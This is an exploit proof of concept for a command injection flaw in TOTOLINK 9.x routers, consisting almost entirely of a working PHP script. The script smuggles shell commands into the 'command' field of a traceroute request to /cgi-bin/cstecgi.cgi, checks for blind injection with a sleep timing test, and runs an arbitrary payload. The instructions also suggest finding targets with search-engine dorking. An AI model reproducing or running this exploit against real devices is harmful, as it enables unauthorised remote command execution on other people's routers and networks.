=============================================================================================================================================
| # Title     : TOTOLINK 9.x Code Injection Vulnerability                                                                                   |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://www.totolink.net/                                                                                                   |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class TotolinkExploit {
    private $targetUri;
    private $sleepTime;

    public function __construct($targetUri, $sleepTime = 3) {
        $this->targetUri = $targetUri;
        $this->sleepTime = $sleepTime;
    }

    // Function to send POST request and execute the command on the target
    public function executeCommand($cmd) {
        $num = rand(1, 500);
        $url = $this->targetUri . '/cgi-bin/cstecgi.cgi';
        $data = json_encode([
            "command" => "127.0.0.1; {$cmd};#",
            "num" => $num,
            "topicurl" => "setTracerouteCfg"
        ]);

        // Send POST request
        return $this->sendPostRequest($url, $data);
    }

    // Check if the target is vulnerable
    public function check() {
        echo "Checking if the target can be exploited.\n";

        // Test using echo command to see if it's vulnerable
        $response = $this->executeCommand("echo test");
        if (!$response || strpos($response, 'success') === false) {
            return "Target is likely not vulnerable.\n";
        }

        // Test command injection using sleep
        echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";
        $start = microtime(true);
        $this->executeCommand("sleep {$this->sleepTime}");
        $elapsedTime = microtime(true) - $start;

        echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";
        if ($elapsedTime >= $this->sleepTime) {
            return "Target is vulnerable: Blind command injection successful.\n";
        }

        return "Command injection test failed.\n";
    }

    // Exploit the vulnerability to run the payload
    public function exploit($payload) {
        echo "Executing payload on the target.\n";
        $this->executeCommand($payload);
    }

    // Helper function to send POST requests
    private function sendPostRequest($url, $postFields) {
        $options = [
            'http' => [
                'method' => 'POST',
                'header' => 'Content-Type: application/x-www-form-urlencoded',
                'content' => $postFields
            ]
        ];
        $context = stream_context_create($options);
        return file_get_contents($url, false, $context);
    }
}

// Example of usage
$targetUri = 'http://target-ip'; // Replace with actual target URL
$exploit = new TotolinkExploit($targetUri);
echo $exploit->check();
$exploit->exploit('whoami'); // Replace with your payload



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================